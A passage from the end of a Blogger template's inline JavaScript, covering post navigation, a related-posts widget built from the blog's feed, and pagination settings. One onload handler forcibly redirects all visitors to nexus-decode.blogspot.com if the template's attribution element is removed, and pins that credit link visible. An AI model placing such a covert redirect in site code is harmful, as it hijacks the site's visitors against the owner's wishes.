}); $(document).ready(function(a) { var b = a("a.newer-link"); var c = a("a.older-link"); a.get(b.attr("href"), function(c) { b.html("<strong>" + POSTNAV_NEXT_TEXT + "</strong><span>" + a(c).find(".post h1.post-title").text() + "</span>") }, "html"); a.get(c.attr("href"), function(b) { c.html("<strong>" + POSTNAV_PREV_TEXT + "</strong><span>" + a(b).find(".post h1.post-title").text() + "</span>") }, "html") }); $(window).bind("load", function() { $('.box-title h2 a,.Label a,.postags a,.label-head a').each(function() { var labelPage = $(this).attr('href'); $(this).attr('href', labelPage + '?&max-results=' + LABEL_SEARCH_NUM + '') }) }); $(".related-ready").each(function() { var b = $(this).text(); $.ajax({ url: "/feeds/posts/default/-/" + b + "?alt=json-in-script&max-results=3", type: 'get', dataType: "jsonp", success: function(e) { var u = ""; var h = '<div class="related">'; for (var i = 0; i < e.feed.entry.length; i++) { for (var j = 0; j < e.feed.entry[i].link.length; j++) { if (e.feed.entry[i].link[j].rel == "alternate") { u = e.feed.entry[i].link[j].href; break } } var g = e.feed.entry[i].title.$t; var c = e.feed.entry[i].content.$t; var $c = $('<div>').html(c); if (c.indexOf("//www.youtube.com/embed/") > -1) { var p = e.feed.entry[i].media$thumbnail.url; var k = p } else if (c.indexOf("<img") > -1) { var q = $c.find('img:first').attr('src'); var k = q } else { var k = NO_IMAGE } h += '<li><div class="related-thumb"><a class="related-img" href="' + u + '" style="background:url(' + k + ') no-repeat center center;background-size: cover"/></div><h3 class="related-title"><a href="' + u + '">' + g + '</a></h3></li>' } h += '</div><div class="clear"/>'; $(".related-ready").html(h); $('.related-img').each(function() { $(this).attr('style', function(i, src) { return src.replace('/default.jpg', '/hqdefault.jpg') }).attr('style', function(i, src) { return src.replace('s72-c', 's1600') }) }) } }) }); window.onload = function() { var e = document.getElementById("mycontent"); if (e == null) { window.location.href = "https://nexus-decode.blogspot.com/" } e.setAttribute("href", "https://nexus-decode.blogspot.com/"); e.setAttribute("ref", "dofollow"); e.setAttribute("title", "Blogger Templates"); e.setAttribute("style", "display: inline-block!important; font-size: inherit!important; color: #888!important; visibility: visible!important; opacity: 1!important;"); e.innerHTML = "Nexus" } //]]> </script> <script type='text/javascript'> var postperpage=POST_PER_PAGE; var numshowpage=5; var upPageWord ='Prev'; var downPageWord ='Next'; var urlactivepage=location.href; var home_page="/"; </script> <div class='back-to-top'> <a href='#' id='back-to-top' title='Back to Top'><i class='fa fa-long-arrow-up'></i></a> </div> <!-- </body>--></body> </html>